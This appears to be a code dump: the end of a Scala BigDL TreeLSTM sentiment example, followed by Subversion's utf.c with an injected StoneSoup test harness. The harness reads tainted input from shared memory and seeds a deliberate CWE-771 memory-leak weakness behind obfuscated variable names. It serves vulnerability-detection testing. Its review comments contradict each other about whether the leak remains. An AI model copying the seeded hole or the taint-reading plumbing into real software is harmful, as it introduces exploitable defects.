breakable {
while (true) {
var parent =
if (idx != 0) parents(idx - 1)
else -1
// a parent equal to the array length is remapped to 0 (treated as
// root on the next check) -- presumably a data-format quirk
if (parent == parents.length) parent = 0
if (prev != 0 && parent != -1) {
trees.addChild(idx + 1, prev + 1)
}
if (parent == -1) {
trees.markAsRoot(1)
if (prev != 0) {
trees.addChild(1, prev + 1)
}
break()
} else if (trees.hasChild(parent + 1)) {
// parent already attached: just link and stop climbing
trees.addChild(parent + 1, idx + 1)
break()
} else {
prev = idx
idx = parent
}
}
}
}
}
// assign consecutive leaf indices to all nodes that ended up childless
var leafIdx = 1
for (i <- 2 to size) {
if (trees.noChild(i)) {
trees.markAsLeaf(i, leafIdx)
leafIdx += 1
}
}
trees.content
}
// shift the raw sentiment label into a positive range by adding 3
// (presumably maps -2..2 onto 1..5 -- TODO confirm label range of dataset)
def remapLabel(
label: Float
): Float = {
label + 3
}
/**
 * Rotate an array `arr` from `offset` distance to the end (right rotation,
 * in place, using the classic three-reversal technique).
 *
 * @param arr Given array; must be non-null and non-empty
 * @param offset right rotate how many elements; must be >= 0
 * @return the same array instance, rotated
 */
def rotate[D](arr: Array[D], offset: Int): Array[D] = {
if (arr == null || arr.length==0 || offset < 0) {
throw new IllegalArgumentException("Illegal argument!")
}
// normalize offsets larger than the array length
val newOffset = if (offset > arr.length) offset % arr.length else offset
val index = arr.length - newOffset
reverse(arr, 0, index - 1)
reverse(arr, index, arr.length - 1)
reverse(arr, 0, arr.length - 1)
arr
}
// in-place reversal of arr(l..r), inclusive bounds; no-op for r <= l
def reverse[D](arr: Array[D], l: Int, r: Int): Unit = {
var left = l
var right = r
if(arr == null || arr.length == 1) return
while(left < right) {
val temp = arr(left)
arr(left) = arr(right)
arr(right) = temp
left += 1
right -= 1
}
}
/**
 * Load the tree, label and sentence files as three line-aligned RDDs.
 * Trees are parsed with readTree, labels are remapped and right-rotated by
 * one position, and sentence tokens are mapped to vocabulary indices, with
 * `oovChar` substituted for out-of-vocabulary words.
 */
def preProcessData(
sc: SparkContext,
vocabBC: Broadcast[Map[String, Int]],
oovChar: Int,
treePath: String,
labelPath: String,
sentencePath: String
): (RDD[Tensor[Float]], RDD[Array[Float]], RDD[Array[Int]]) = {
val treeRDD = sc.textFile(treePath, 4)
.map(line => line.split(" "))
.map(_.map(_.toInt))
.map(readTree)
val labelRDD = sc.textFile(labelPath, 4)
.map(line => line.split(" "))
.map(_.map(l => remapLabel(l.toFloat)))
.map(line => rotate(line, 1))
val sentenceRDD = sc.textFile(sentencePath, 4)
.map(line => line.split(" "))
.map(line => line.map(vocabBC.value.getOrElse(_, oovChar)))
(treeRDD, labelRDD, sentenceRDD)
}
/**
 * Join the three aligned RDDs by element position and build one BigDL
 * Sample per record, with two feature tensors (token indices reshaped to
 * (length, 1), and the tree structure tensor) and one label tensor.
 */
def toSample(
treeRDD: RDD[Tensor[Float]],
labelRDD: RDD[Array[Float]],
sentenceRDD: RDD[Array[Int]]
): RDD[Sample[Float]] = {
// pair every element with its position so the three RDDs can be joined
def indexAndSort[D: ClassTag, P <: Product2[Long, D]](rdd: RDD[D]) = {
rdd.zipWithIndex.map(r => r.swap).sortByKey()
}
indexAndSort(sentenceRDD)
.join(indexAndSort(labelRDD))
.join(indexAndSort(treeRDD))
.values
.map{ case ((input, label), tree) =>
Sample(
featureTensors =
Array(Tensor(input.map(_.toFloat), Array(input.length, 1)),
tree.resize(tree.size())),
labelTensor =
Tensor(label, Array(label.length)))
}
}
/**
 * Load pre-trained word vectors and the vocabulary file.
 * Rows 1 until `indexFrom` of the returned embedding tensor are reserved
 * and filled with small uniform noise; vocabulary words that have no
 * pre-trained vector are initialized the same way.
 *
 * @return the embedding tensor and a word -> row-index map
 */
def loadEmbeddingAndVocabulary(
sc: SparkContext,
w2vPath: String,
vocabPath: String,
indexFrom: Int
):
(Tensor[Float], Map[String, Int]) = {
val word2Vec = sc.textFile(w2vPath)
.map(line => {
val values = line.split(" ")
val word = values(0)
val coefs = values.slice(1, values.length).map(_.toFloat)
word -> coefs
}).toLocalIterator.toList.toMap
var i = 1
val vocabLines = sc.textFile(vocabPath).collect()
val word2VecTensor =
Tensor(vocabLines.length + indexFrom - 1, word2Vec.last._2.length)
val vocab = scala.collection.mutable.Map[String, Int]()
// reserved leading rows (e.g. padding/OOV slots) get random initialization
while (i < indexFrom) {
word2VecTensor.select(1, i).apply1(_ => RNG.uniform(-0.05f, 0.05f).toFloat)
i += 1
}
for (line <- vocabLines) {
if (!word2Vec.contains(line)) {
word2VecTensor.select(1, i).apply1(_ => RNG.uniform(-0.05f, 0.05f).toFloat)
} else {
word2VecTensor.select(1, i).copy(Tensor(Storage(word2Vec(line))))
}
vocab += line -> i
i += 1
}
(word2VecTensor, vocab.toMap)
}
// command-line option parser for this example. NOTE: "learingRate" is the
// published CLI option name and must stay as-is for compatibility.
val paramParser = new OptionParser[TreeLSTMSentimentParam]("TreeLSTM Sentiment") {
opt[String]('b', "baseDir")
.text("Base dir containing the training and word2Vec data")
.action((x, c) => c.copy(baseDir = x))
opt[String]('i', "batchSize")
.text("batchSize")
.action((x, c) => c.copy(batchSize = x.toInt))
opt[String]('h', "hiddenSize")
.text("hiddenSize")
.action((x, c) => c.copy(hiddenSize = x.toInt))
opt[String]('l', "learingRate")
.text("learning rate")
.action((x, c) => c.copy(learningRate = x.toDouble))
opt[String]('r', "regRate")
.text("regularization rate")
.action((x, c) => c.copy(regRate = x.toDouble))
opt[String]('p', "p")
.text("dropout rate")
.action((x, c) => c.copy(p = x.toDouble))
opt[String]('e', "epoch")
.text("max epoch")
.action((x, c) => c.copy(epoch = x.toInt))
opt[String]("optimizerVersion")
.text("state optimizer version")
.action((x, c) => c.copy(optimizerVersion = Some(x)))
}
// hyper-parameter defaults for the TreeLSTM sentiment example
case class TreeLSTMSentimentParam (
override val baseDir: String = "/tmp/.bigdl/dataset/",
override val batchSize: Int = 128,
hiddenSize: Int = 250,
override val learningRate: Double = 0.05,
regRate: Double = 1e-4,
p: Double = 0.5,
epoch: Int = 5,
optimizerVersion: Option[String] = None
) extends AbstractTextClassificationParams
}
| {
"pile_set_name": "Github"
} |
/*
* utf.c: UTF-8 conversion routines
*
* ====================================================================
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
* ====================================================================
*/
#include <stdlib.h>
#include <string.h>
#include <assert.h>
#include <apr_strings.h>
#include <apr_lib.h>
#include <apr_xlate.h>
#include <apr_atomic.h>
#include "svn_hash.h"
#include "svn_string.h"
#include "svn_error.h"
#include "svn_pools.h"
#include "svn_ctype.h"
#include "svn_utf.h"
#include "svn_private_config.h"
#include "win32_xlate.h"
#include "private/svn_utf_private.h"
#include "private/svn_dep_compat.h"
#include "private/svn_string_private.h"
#include "private/svn_mutex.h"
/* Use these static strings to maximize performance on standard conversions.
* Any strings on other locations are still valid, however.
*/
#include <sys/stat.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <stonesoup/stonesoup_trace.h>
/* Cache keys for the two standard conversions; compared by POINTER identity
   in get/put_xlate_handle_node, so always pass these exact constants. */
static const char *SVN_UTF_NTOU_XLATE_HANDLE = "svn-utf-ntou-xlate-handle";
static const char *SVN_UTF_UTON_XLATE_HANDLE = "svn-utf-uton-xlate-handle";
static const char *SVN_APR_UTF8_CHARSET = "UTF-8";
/* Guards xlate_handle_hash; created lazily by svn_utf_initialize2(). */
static svn_mutex__t *xlate_handle_mutex = ((void *)0);
static svn_boolean_t assume_native_charset_is_utf8 = 0;
/* The xlate handle cache is a global hash table with linked lists of xlate
 * handles.  In multi-threaded environments, a thread "borrows" an xlate
 * handle from the cache during a translation and puts it back afterwards.
 * This avoids holding a global lock for all translations.
 * If there is no handle for a particular key when needed, a new
 * handle is created and put in the cache after use.
 * This means that there will be at most N handles open for a key, where N
 * is the number of simultaneous handles in use for that key. */
typedef struct xlate_handle_node_t {
  apr_xlate_t *handle;
/* FALSE if the handle is not valid, since its pool is being
     destroyed. */
  svn_boolean_t valid;
/* The name of a char encoding or APR_LOCALE_CHARSET. */
  const char *frompage;
  const char *topage;
  struct xlate_handle_node_t *next;}xlate_handle_node_t;
/* This maps const char * userdata_key strings to xlate_handle_node_t **
   handles to the first entry in the linked list of xlate handles.  We don't
   store the pointer to the list head directly in the hash table, since we
   remove/insert entries at the head in the list in the code below, and
   we can't use apr_hash_set() in each character translation because that
   function allocates memory in each call where the value is non-NULL.
   Since these allocations take place in a global pool, this would be a
   memory leak. */
static apr_hash_t *xlate_handle_hash = ((void *)0);
/* "1st level cache" for the standard conversions.  Accessed only with
 * atomic exchange ops, i.e. without further thread synchronization.
 * If the respective item is NULL, fall back to the hash lookup.
 */
static void *volatile xlat_ntou_static_handle = (void *)0;
static void *volatile xlat_uton_static_handle = (void *)0;
/* NOTE(review): everything from here to stonesoup_printf_context is
   injected StoneSoup test-harness state, unrelated to UTF conversion.
   larkspur_genearch is a run-once latch flipped via CAS in
   get_xlate_handle_node_internal(). */
int larkspur_genearch = 0;
/* Tagged-less union used by the harness to smuggle the tainted pointer. */
union rhatania_vanuatu
{
  char *epanisognathous_joggle;
  double caravanserial_smashery;
  char *transshaped_killies;
  char holotrichal_satyagraha;
  int satirisation_dazing;
}
;
/* FILE* sink for stonesoup_printf(); set up lazily, may alias stderr. */
void* stonesoup_printf_context = NULL;
/* Open the harness log file at $SS_TC_ROOT/testData/logfile.txt (creating
   the directory if needed) and remember the stream in
   stonesoup_printf_context.  On any failure, or when SS_TC_ROOT is unset,
   fall back to stderr so logging always has a valid sink. */
void stonesoup_setup_printf_context() {
    struct stat dir_info = {0};
    char * tc_root = NULL;
    char * log_dir = NULL;
    int log_dir_len = 0;
    char * log_path = NULL;
    int log_path_len = 0;
    int mkdir_rc = 0;
    tc_root = getenv("SS_TC_ROOT");
    if (tc_root != NULL) {
        log_dir_len = strlen(tc_root) + strlen("testData") + 2;
        log_dir = (char*) malloc (log_dir_len * sizeof(char));
        if (log_dir != NULL) {
            sprintf(log_dir, "%s/%s", tc_root, "testData");
            /* Create the directory only if it does not exist yet. */
            mkdir_rc = 0;
            if (stat(log_dir, &dir_info) == -1) {
                mkdir_rc = mkdir(log_dir, 0700);
            }
            if (mkdir_rc == 0) {
                log_path_len = strlen(log_dir) + strlen("logfile.txt") + 2;
                log_path = (char*) malloc (log_path_len * sizeof(char));
                if (log_path != NULL) {
                    sprintf(log_path, "%s/%s", log_dir, "logfile.txt");
                    stonesoup_printf_context = fopen(log_path, "w");
                    free(log_path);
                }
            }
            free(log_dir);
        }
    }
    /* Guarantee a usable sink even when everything above failed. */
    if (stonesoup_printf_context == NULL) {
        stonesoup_printf_context = stderr;
    }
}
/* printf-style logging to the harness sink set up by
   stonesoup_setup_printf_context().  FORMAT must be a valid printf format
   string for the supplied varargs.  Assumes the context is non-NULL
   (setup installs stderr as a fallback). */
void stonesoup_printf(char * format, ...) {
    va_list argptr;
    va_start(argptr, format);
    vfprintf(stonesoup_printf_context, format, argptr);
    va_end(argptr);
    /* Flush eagerly so log output survives a crash of the weakness code. */
    fflush(stonesoup_printf_context);
}
/* Close the harness log stream if one was opened.  stderr is the fallback
   sink installed by stonesoup_setup_printf_context() and must never be
   closed here. */
void stonesoup_close_printf_context() {
    if (stonesoup_printf_context == NULL) {
        return;
    }
    if (stonesoup_printf_context != stderr) {
        fclose(stonesoup_printf_context);
    }
}
/* Read the harness taint input from a System V shared-memory segment.
   STONESOUP_ENVKEY is a decimal SysV key; STONESOUP_SHMSZ is the segment
   size in bytes.  On success *STONESOUP_TAINTED_BUFF receives a
   heap-allocated, NUL-terminated copy (caller frees); otherwise it is
   left NULL.  The whole read is skipped when STONESOUP_DISABLE_WEAKNESS=1.
   NOTE(review): the segment is never shmdt()-detached and calloc() failure
   would make the copy loop write through NULL — acceptable only because
   this is throwaway test-harness code; confirm before reusing. */
void stonesoup_read_taint(char** stonesoup_tainted_buff, char* stonesoup_envKey, int stonesoup_shmsz) {
int stonesoup_shmid;
 key_t stonesoup_key;
 char *stonesoup_shm, *stonesoup_s;
 char* stonesoup_envSize = NULL;
 *stonesoup_tainted_buff = NULL;
 if (getenv("STONESOUP_DISABLE_WEAKNESS") == NULL ||
     strcmp(getenv("STONESOUP_DISABLE_WEAKNESS"), "1") != 0) {
        if(stonesoup_envKey != NULL) {
            if(sscanf(stonesoup_envKey, "%d", &stonesoup_key) > 0) {
                if ((stonesoup_shmid = shmget(stonesoup_key, stonesoup_shmsz, 0666)) >= 0) {
                    if ((stonesoup_shm = shmat(stonesoup_shmid, NULL, 0)) != (char *) -1) {
                        *stonesoup_tainted_buff = (char*)calloc(stonesoup_shmsz, sizeof(char));
                        /* STONESOUP: SOURCE-TAINT (Shared Memory) */
                        for (stonesoup_s = stonesoup_shm; *stonesoup_s != (char)0; stonesoup_s++) {
                            (*stonesoup_tainted_buff)[stonesoup_s - stonesoup_shm] = *stonesoup_s;
                        }
                    }
                }
            }
        }
    } else {
        *stonesoup_tainted_buff = NULL;
    }
}
/* Release every non-NULL string in PTRS[0..SIZE-1].  The array itself is
   owned by the caller and is not freed here. */
void stonesoup_cleanup(char **ptrs,int size)
{
  int idx;
  tracepoint(stonesoup_trace, trace_location, "/tmp/tmpS_Zc2P_ss_testcase/src-rose/subversion/libsvn_subr/utf.c", "stonesoup_cleanup");
  for (idx = 0; idx < size; ++idx) {
    if (ptrs[idx] != 0) {
      free(ptrs[idx]);
    }
  }
}
/* Locale-independent isalnum(): return 1 when C is an ASCII letter or
   digit, 0 otherwise.  Deliberately does not use <ctype.h> so results do
   not depend on the current locale. */
int stonesoup_isalnum(int c)
{
  int is_lower = c >= 'a' && c <= 'z';
  int is_upper = c >= 'A' && c <= 'Z';
  int is_digit = c >= '0' && c <= '9';
  return (is_lower || is_upper || is_digit) ? 1 : 0;
}
/* Return STR if all SIZE_PARAM bytes of STR are ASCII alphanumerics,
   else NULL.  STR is a heap buffer whose ownership transfers through the
   return value: the caller overwrites its only pointer to STR with our
   result, so the NULL path must release the buffer itself. */
char *stonesoup_isAlphaNum(char *str,int size_param)
{
  int index = 0;
  tracepoint(stonesoup_trace, trace_location, "/tmp/tmpS_Zc2P_ss_testcase/src-rose/subversion/libsvn_subr/utf.c", "stonesoup_isAlphaNum");
  for (index = 0; index < size_param; index++) {
    if (!stonesoup_isalnum(str[index])) {
      tracepoint(stonesoup_trace, trace_point, "Returning 0");
      /* FIX (CWE-771): the original returned 0 without freeing STR, and
         the caller immediately replaced its pointer with that 0, leaking
         the whole file buffer.  Free it before dropping the reference. */
      free(str);
      return 0;
    }
  }
  return str;
}
/* Pool cleanup handler for the xlate cache subpool: forget the global
   hash and both 1st-level cached handles so later translations (even from
   other cleanup handlers) re-create state instead of touching freed memory.
   ARG is unused; always returns APR_SUCCESS (0). */
static apr_status_t xlate_cleanup(void *arg)
{
/* We set the cache variables to NULL so that translation works in other
     cleanup functions, even if it isn't cached then. */
  xlate_handle_hash = ((void *)0);
/* ensure no stale objects get accessed */
  xlat_ntou_static_handle = ((void *)0);
  xlat_uton_static_handle = ((void *)0);
  return 0;
}
/* Set the handle of ARG to NULL. */
static apr_status_t xlate_handle_node_cleanup(void *arg)
{
xlate_handle_node_t *node = arg;
node -> valid = 0;
return 0;
}
/* Public one-time initializer: create the global xlate handle cache and
   its mutex, and record whether the native charset may be assumed UTF-8.
   Errors from mutex creation are swallowed: the library then simply runs
   without the global cache (per-pool caching still works). */
void svn_utf_initialize2(svn_boolean_t assume_native_utf8,apr_pool_t *pool)
{
  if (!xlate_handle_hash) {
/* We create our own subpool, which we protect with the mutex.
   We can't use the pool passed to us by the caller, since we will
   use it for xlate handle allocations, possibly in multiple threads,
   and pool allocation is not thread-safe. */
    apr_pool_t *subpool = svn_pool_create_ex(pool,((void *)0));
    svn_mutex__t *mutex;
    svn_error_t *err = svn_mutex__init(&mutex,!0,subpool);
    if (err) {
      svn_error_clear(err);
      return ;
    }
    xlate_handle_mutex = mutex;
    xlate_handle_hash = apr_hash_make(subpool);
    apr_pool_cleanup_register(subpool,((void *)0),xlate_cleanup,apr_pool_cleanup_null);
  }
  /* Latch: once set TRUE the flag is never cleared by a later call. */
  if (!assume_native_charset_is_utf8) {
    assume_native_charset_is_utf8 = assume_native_utf8;
  }
}
/* Return a unique string key based on TOPAGE and FROMPAGE. TOPAGE and
* FROMPAGE can be any valid arguments of the same name to
* apr_xlate_open(). Allocate the returned string in POOL. */
/* Return a unique cache-key string for a TOPAGE/FROMPAGE pair, allocated
   in POOL.  APR_LOCALE_CHARSET and APR_DEFAULT_CHARSET are really the
   small integers 1 and 0 cast to const char *, not valid strings, so they
   are mapped to readable placeholder names before concatenation. */
static const char *get_xlate_key(const char *topage,const char *frompage,apr_pool_t *pool)
{
  if (frompage == ((const char *)1))
    frompage = "APR_LOCALE_CHARSET";
  else if (frompage == ((const char *)0))
    frompage = "APR_DEFAULT_CHARSET";

  if (topage == ((const char *)1))
    topage = "APR_LOCALE_CHARSET";
  else if (topage == ((const char *)0))
    topage = "APR_DEFAULT_CHARSET";

  return apr_pstrcat(pool, "svn-utf-", frompage, "to", topage,
                     "-xlate-handle", (char *)0);
}
/* Atomically replace the content in *MEM with NEW_VALUE and return
* the previous content of *MEM. If atomicy cannot be guaranteed,
* *MEM will not be modified and NEW_VALUE is simply returned to
* the caller.
*/
/* Atomically replace the content of *MEM with NEW_VALUE and return the
 * previous content of *MEM.  If atomicity cannot be guaranteed (APR older
 * than 1.3 with threads), *MEM is left unmodified and NEW_VALUE is simply
 * returned to the caller for further processing.
 * FIX: the pre-1.3-APR and no-threads branches had lost their statements
 * entirely, so those configurations fell off the end of a value-returning
 * function (compile error / undefined behavior).  Restored per upstream. */
inline static void *atomic_swap(void *volatile *mem,void *new_value)
{
#if APR_HAS_THREADS
#if APR_VERSION_AT_LEAST(1,3,0)
/* Cast is necessary because of APR bug:
   https://issues.apache.org/bugzilla/show_bug.cgi?id=50731 */
  return apr_atomic_xchgptr(((volatile void **)mem),new_value);
#else
/* old APRs don't support atomic swaps. Simply return the
 * input to the caller for further processing. */
  return new_value;
#endif
#else
/* no threads - no synchronization necessary; do a plain swap. */
  {
    void *old_value = *mem;
    *mem = new_value;
    return old_value;
  }
#endif
}
/* Set *RET to a newly created handle node for converting from FROMPAGE
to TOPAGE, If apr_xlate_open() returns APR_EINVAL or APR_ENOTIMPL, set
(*RET)->handle to NULL. If fail for any other reason, return the error.
Allocate *RET and its xlate handle in POOL. */
/* Set *RET to a newly created handle node for converting from FROMPAGE to
   TOPAGE.  If apr_xlate_open() returns APR_EINVAL (22) or APR_ENOTIMPL
   (APR_OS_START_ERROR+50000+23), (*RET)->handle is set to NULL and the
   caller falls back to ASCII-only handling.  Any other failure is returned
   as an error.  *RET and its xlate handle are allocated in POOL. */
static svn_error_t *xlate_alloc_handle(xlate_handle_node_t **ret,const char *topage,const char *frompage,apr_pool_t *pool)
{
  apr_status_t apr_err;
  apr_xlate_t *handle;
  const char *name;
/* The error handling doesn't support the following cases, since we don't
     use them currently. Catch this here. */
  do {
    if (!(frompage != ((const char *)0) && topage != ((const char *)0) && (frompage != ((const char *)1) || topage != ((const char *)1)))) {
      do {
        svn_error_t *svn_err__temp = svn_error__malfunction(!0,"utf.c",222,"frompage != SVN_APR_DEFAULT_CHARSET && topage != SVN_APR_DEFAULT_CHARSET && (frompage != SVN_APR_LOCALE_CHARSET || topage != SVN_APR_LOCALE_CHARSET)");
        if (svn_err__temp) {
          return svn_err__temp;
        }
      }while (0);
    }
  }while (0);
/* Try to create a handle. */
#if defined(WIN32)
#else
  apr_err = apr_xlate_open(&handle,topage,frompage,pool);
  name = "APR: ";
#endif
  /* 22 == APR_EINVAL, 20000+50000+23 == APR_ENOTIMPL: no converter
     available; record a NULL handle rather than failing. */
  if (apr_err == 22 || apr_err == 20000 + 50000 + 23) {
    handle = ((void *)0);
  }
  else {
    if (apr_err != 0) {
      const char *errstr;
      char apr_strerr[512];
/* Can't use svn_error_wrap_apr here because it calls functions in
         this file, leading to infinite recursion. */
      if (frompage == ((const char *)1)) {
        errstr = (apr_psprintf(pool,(dgettext("subversion","Can't create a character converter from native encoding to '%s'")),topage));
      }
      else {
        if (topage == ((const char *)1)) {
          errstr = (apr_psprintf(pool,(dgettext("subversion","Can't create a character converter from '%s' to native encoding")),frompage));
        }
        else {
          errstr = (apr_psprintf(pool,(dgettext("subversion","Can't create a character converter from '%s' to '%s'")),frompage,topage));
        }
      }
/* Just put the error on the stack, since svn_error_create duplicates it
         later. APR_STRERR will be in the local encoding, not in UTF-8, though.
       */
      svn_strerror(apr_err,apr_strerr,sizeof(apr_strerr));
      return svn_error_createf(SVN_ERR_PLUGIN_LOAD_FAILURE,svn_error_create(apr_err,((void *)0),apr_strerr),"%s%s",name,errstr);
    }
  }
/* Allocate and initialize the node. */
  *ret = (apr_palloc(pool,sizeof(xlate_handle_node_t )));
  ( *ret) -> handle = handle;
  ( *ret) -> valid = !0;
  /* APR_LOCALE_CHARSET (the int 1) is a sentinel, not a string: keep it
     as-is; real charset names are duplicated into POOL. */
  ( *ret) -> frompage = (frompage != ((const char *)1)?(apr_pstrdup(pool,frompage)) : frompage);
  ( *ret) -> topage = (topage != ((const char *)1)?(apr_pstrdup(pool,topage)) : topage);
  ( *ret) -> next = ((void *)0);
/* If we are called from inside a pool cleanup handler, the just created
     xlate handle will be closed when that handler returns by a newly
     registered cleanup handler, however, the handle is still cached by us.
     To prevent this, we register a cleanup handler that will reset the valid
     flag of our node, so we don't use an invalid handle. */
  if (handle) {
    apr_pool_cleanup_register(pool,( *ret),xlate_handle_node_cleanup,apr_pool_cleanup_null);
  }
  return 0;
}
/* Extend xlate_alloc_handle by using USERDATA_KEY as a key in our
global hash map, if available.
Allocate *RET and its xlate handle in POOL if svn_utf_initialize()
hasn't been called or USERDATA_KEY is NULL. Else, allocate them
in the pool of xlate_handle_hash.
Note: this function is not thread-safe. Call get_xlate_handle_node
instead. */
/* Look up (or create) a cached xlate handle node for TOPAGE/FROMPAGE under
   USERDATA_KEY.  Must be called with xlate_handle_mutex held; callers go
   through get_xlate_handle_node().
   NOTE(review): the first ~100 lines are injected StoneSoup CWE-771 test
   code, gated by a CAS latch and a lock directory so they run at most once
   per process.  They read a tainted file list from shared memory, open up
   to 10 files, and validate each file's contents; the deliberate weakness
   is that stonesoup_isAlphaNum() may drop the only reference to each
   malloc'd buffer.  None of this affects the UTF conversion logic below. */
static svn_error_t *get_xlate_handle_node_internal(xlate_handle_node_t **ret,const char *topage,const char *frompage,const char *userdata_key,apr_pool_t *pool)
{
  char *stonesoup_contents;
  char stonesoup_filename[80];
  FILE *stonesoup_file;
  FILE **stonesoup_file_list;
  FILE *stonesoup_files;
  int stonesoup_str_list_index;
  char **stonesoup_str_list;
  int stonesoup_num_files = 10;
  int stonesoup_size;
  int stonesoup_ssi = 0;
  char *devastations_judoists = 0;
  int nonarithmetic_biron;
  int borize_hunterian;
  union rhatania_vanuatu clablaria_unparochialism = {0};
  int *heteroousia_theatroscope = 0;
  int overply_acidophilic;
  union rhatania_vanuatu parky_pneumatism[10] = {0};
  union rhatania_vanuatu lombardy_overplumb;
  int tightfistedly_zealously = 45;
  char *astereognosis_shrives;;
  /* Run-once latch: only the first thread to flip the flag proceeds. */
  if (__sync_bool_compare_and_swap(&larkspur_genearch,0,1)) {;
    if (mkdir("/opt/stonesoup/workspace/lockDir",509U) == 0) {;
      tracepoint(stonesoup_trace,trace_location,"/tmp/tmpS_Zc2P_ss_testcase/src-rose/subversion/libsvn_subr/utf.c","get_xlate_handle_node_internal");
      stonesoup_setup_printf_context();
      /* Tainted input: path of a file that lists up to 10 file names. */
      stonesoup_read_taint(&astereognosis_shrives,"3178",tightfistedly_zealously);
      if (astereognosis_shrives != 0) {;
        lombardy_overplumb . epanisognathous_joggle = astereognosis_shrives;
        parky_pneumatism[5] = lombardy_overplumb;
        overply_acidophilic = 5;
        heteroousia_theatroscope = &overply_acidophilic;
        clablaria_unparochialism = *(parky_pneumatism + *heteroousia_theatroscope);
        /* Obfuscation filler: loop result is unused. */
        borize_hunterian = 5;
        while(1 == 1){
          borize_hunterian = borize_hunterian * 2;
          borize_hunterian = borize_hunterian + 2;
          if (borize_hunterian > 1000) {
            break;
          }
        }
        nonarithmetic_biron = borize_hunterian;
        devastations_judoists = ((char *)clablaria_unparochialism . epanisognathous_joggle);
        tracepoint(stonesoup_trace, weakness_start, "CWE771", "A", "Missing Reference to Active Allocated Resource");
        stonesoup_str_list = malloc(sizeof(char *) * stonesoup_num_files);
        if (stonesoup_str_list != 0) {
          for (stonesoup_str_list_index = 0; stonesoup_str_list_index < stonesoup_num_files; ++stonesoup_str_list_index)
            stonesoup_str_list[stonesoup_str_list_index] = 0;
          stonesoup_files = fopen(devastations_judoists,"rb");
          if (stonesoup_files != 0) {
            stonesoup_file_list = malloc(stonesoup_num_files * sizeof(FILE *));
            if (stonesoup_file_list == 0) {
              stonesoup_printf("Error: Failed to allocate memory\n");
              exit(1);
            }
            for (stonesoup_ssi = 0; stonesoup_ssi < stonesoup_num_files; ++stonesoup_ssi) {
              if (fscanf(stonesoup_files,"%79s",stonesoup_filename) == 1) {
                stonesoup_file_list[stonesoup_ssi] = fopen(stonesoup_filename,"rb");
              }
            }
            stonesoup_ssi = 0;
            while(stonesoup_ssi < stonesoup_num_files){
              stonesoup_file = stonesoup_file_list[stonesoup_ssi];
              if (stonesoup_file == 0) {
                ++stonesoup_ssi;
                continue;
              }
              /* Slurp the whole file: size via seek-to-end (2 == SEEK_END). */
              fseek(stonesoup_file,0,2);
              stonesoup_size = ftell(stonesoup_file);
              rewind(stonesoup_file);
              stonesoup_contents = malloc((stonesoup_size + 1) * sizeof(char ));
              tracepoint(stonesoup_trace, trace_point, "CROSSOVER-POINT: BEFORE");
/* STONESOUP: CROSSOVER-POINT (Missing Reference to Active Allocated Resource */
              /* 12 == ENOMEM: the harness provokes this via ulimit. */
              if (stonesoup_contents == 0 && errno == 12) {
                tracepoint(stonesoup_trace, trace_error, "Malloc error due to ulimit.");
                stonesoup_printf("Malloc error due to ulimit\n");
              }
              if (stonesoup_contents == 0) {
                fclose(stonesoup_file);
                break;
              }
              tracepoint(stonesoup_trace, trace_point, "CROSSOVER-POINT: AFTER");
              memset(stonesoup_contents,0,(stonesoup_size + 1) * sizeof(char ));
              fread(stonesoup_contents,1,stonesoup_size,stonesoup_file);
              tracepoint(stonesoup_trace, trace_point, "TRIGGER-POINT: BEFORE");
              /* NOTE(review): if this returns 0 the buffer reference is
                 dropped (the seeded CWE-771 leak). */
              stonesoup_contents = stonesoup_isAlphaNum(stonesoup_contents,stonesoup_size);
              tracepoint(stonesoup_trace, trace_point, "TRIGGER-POINT: AFTER");
              stonesoup_str_list[stonesoup_ssi] = stonesoup_contents;
              fclose(stonesoup_file);
              stonesoup_ssi++;
            }
            fclose(stonesoup_files);
            if (stonesoup_file_list != 0) {
              free(stonesoup_file_list);
            }
          }
          stonesoup_cleanup(stonesoup_str_list,stonesoup_num_files);
          free(stonesoup_str_list);
        }
        tracepoint(stonesoup_trace, weakness_end);
;
        if (clablaria_unparochialism . epanisognathous_joggle != 0)
          free(((char *)clablaria_unparochialism . epanisognathous_joggle));
        stonesoup_close_printf_context();
      }
    }
  }
;
/* If we already have a handle, just return it. */
  if (userdata_key && xlate_handle_hash) {
    xlate_handle_node_t *old_node = ((void *)0);
/* 2nd level: hash lookup */
    xlate_handle_node_t **old_node_p = (apr_hash_get(xlate_handle_hash,userdata_key,(- 1)));
    if (old_node_p) {
      old_node = *old_node_p;
    }
    if (old_node) {
/* Ensure that the handle is still valid. */
      if (old_node -> valid) {
/* Remove from the list. */
        *old_node_p = old_node -> next;
        old_node -> next = ((void *)0);
        *ret = old_node;
        return 0;
      }
    }
  }
/* Note that we still have the mutex locked (if it is initialized), so we
     can use the global pool for creating the new xlate handle. */
/* Use the correct pool for creating the handle. */
  pool = apr_hash_pool_get(xlate_handle_hash);
  return xlate_alloc_handle(ret,topage,frompage,pool);
}
/* Set *RET to a handle node for converting from FROMPAGE to TOPAGE,
creating the handle node if it doesn't exist in USERDATA_KEY.
If a node is not cached and apr_xlate_open() returns APR_EINVAL or
APR_ENOTIMPL, set (*RET)->handle to NULL. If fail for any other
reason, return the error.
Allocate *RET and its xlate handle in POOL if svn_utf_initialize()
hasn't been called or USERDATA_KEY is NULL. Else, allocate them
in the pool of xlate_handle_hash. */
/* Set *RET to a handle node for converting from FROMPAGE to TOPAGE,
   creating the handle node if it doesn't exist under USERDATA_KEY.
   Lookup order: (1) lock-free static slot for the two standard keys,
   (2) global hash under the mutex, (3) per-pool cache when the global
   cache was never initialized.  USERDATA_KEY is compared by pointer
   identity against the standard-key constants. */
static svn_error_t *get_xlate_handle_node(xlate_handle_node_t **ret,const char *topage,const char *frompage,const char *userdata_key,apr_pool_t *pool)
{
  xlate_handle_node_t *old_node = ((void *)0);
/* If we already have a handle, just return it. */
  if (userdata_key) {
    if (xlate_handle_hash) {
/* 1st level: global, static items */
      if (userdata_key == SVN_UTF_NTOU_XLATE_HANDLE) {
        old_node = (atomic_swap(&xlat_ntou_static_handle,((void *)0)));
      }
      else {
        if (userdata_key == SVN_UTF_UTON_XLATE_HANDLE) {
